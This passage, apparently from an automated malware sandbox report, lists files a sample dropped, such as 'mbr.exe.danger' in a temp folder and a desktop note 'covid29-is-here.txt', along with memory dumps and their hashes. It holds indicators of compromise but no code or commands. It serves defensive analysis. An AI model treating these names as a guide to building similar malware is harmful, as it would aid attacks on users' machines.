                                                                                                  SHA1

                                                                                                  44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                                                                  SHA256

                                                                                                  f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                                                                  SHA512

                                                                                                  a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A9C.tmp\mbr.exe.danger

                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                  MD5

                                                                                                  35af6068d91ba1cc6ce21b461f242f94

                                                                                                  SHA1

                                                                                                  cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                                                                  SHA256

                                                                                                  9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                                                                  SHA512

                                                                                                  136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                                                                • C:\Users\Admin\AppData\Local\Temp\wmsetup.log

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  486f7372a256b28051ed8c00a30e8ba7

                                                                                                  SHA1

                                                                                                  91cb6af10f1fb39e3e4adc004257fa30fc542cbb

                                                                                                  SHA256

                                                                                                  5419a91c2e2fe6b0d4b186a1f7eaf76cf777523247a2123419b0f64aa1ccfbed

                                                                                                  SHA512

                                                                                                  f553d1d27b326a90d03796598ad08482182dbd1c6dc650b091d951705d5b045f8b4a935d14c81e95764320ca307583c843cd70885703a9fa72e7e1d342a5c71c

                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  336f4bc8f98cef9e0d3a4c3fc0aae39c

                                                                                                  SHA1

                                                                                                  9f7a32bbda177d21e5930a12005a5d7fc93578d8

                                                                                                  SHA256

                                                                                                  01267a04e36caccec93f9421d910479e7629deee82cabfa5e760d71e78c6991d

                                                                                                  SHA512

                                                                                                  36d40180399a4a740bb16db5a1bed4dc91a118f1a90c2233d58e27f6dd45327f6367bc41b5e544d400200a37f2522922a9d5707e42077e20edfac597e3fc3ab6

                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  075d6d964460d0c2fc7a5216a12a06bb

                                                                                                  SHA1

                                                                                                  7a300f542ab785a866beb7c971415c5878d912ed

                                                                                                  SHA256

                                                                                                  13cacb5a3034ba93a585ab380dd0451f64abbe7cc1710f8717294c4f8f6ba6a1

                                                                                                  SHA512

                                                                                                  a787cf2bf83d6afce0656157077b9b7f35a095ced2db063b830b62b4793827ee5b1bef7409821b5e49d1812ae3c4fbb6e1726c424c9fd29a040b280645c3c5e1

                                                                                                • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                                                                  Filesize

                                                                                                  861B

                                                                                                  MD5

                                                                                                  c53dee51c26d1d759667c25918d3ed10

                                                                                                  SHA1

                                                                                                  da194c2de15b232811ba9d43a46194d9729507f0

                                                                                                  SHA256

                                                                                                  dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                                                                  SHA512

                                                                                                  da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                                                                • memory/324-40-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-35-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-39-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-38-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-37-0x0000000006E80000-0x0000000006E90000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-41-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-33-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-55-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-34-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-42-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/324-36-0x0000000004250000-0x0000000004260000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/2212-918-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.8MB

                                                                                                • memory/2212-923-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.8MB

                                                                                                • memory/2212-796-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  1.8MB

                                                                                                • memory/5384-834-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                  Filesize

                                                                                                  864KB

                                                                                                • memory/5496-840-0x00000000008B0000-0x00000000008D0000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB